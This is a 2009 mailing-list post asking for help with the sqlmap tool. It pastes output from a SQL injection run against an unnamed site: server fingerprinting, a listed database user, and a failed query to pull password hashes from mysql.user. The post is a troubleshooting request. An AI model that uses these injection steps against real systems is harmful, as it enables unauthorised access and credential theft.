[sqlmap-users] problem using --passwords option
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] problem using --passwords option
|
From: Adi M. <adi...@ya...> - 2009-10-05 05:59:27
|
This is the output I got:
[08:54:02] [INFO] resuming match ratio '0.9' from session file
[08:54:02] [INFO] resuming injection point 'GET' from session file
[08:54:02] [INFO] resuming injection parameter 'id' from session file
[08:54:02] [INFO] resuming injection type 'numeric' from session file
[08:54:02] [INFO] resuming 0 number of parenthesis from session file
[08:54:02] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:54:02] [INFO] resuming union comment '#' from session file
[08:54:02] [INFO] resuming union count 9 from session file
[08:54:02] [INFO] resuming union position 4 from session file
[08:54:02] [INFO] testing connection to the target url
[08:54:02] [WARNING] the testable parameter 'id' you provided is not into the Cookie
[08:54:02] [INFO] testing for parenthesis on injectable parameter
[08:54:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5
[08:54:02] [INFO] fetching database users password hashes
[08:54:03] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going bli
[08:54:03] [INFO] fetching database users
[08:54:03] [INFO] read from file 'logs/fmc.log': 'fmcgman'@'localhost'
[08:54:03] [INFO] fetching number of password hashes for user '''
[08:54:03] [ERROR] Unenclosed ' in 'SELECT IFNULL(CAST(COUNT(DISTINCT(password)) AS CHAR(10000)), CHAR(32)) FROM mysql.user WHERE user=CHAR()''
[*] shutting down at: 08:54:03
|
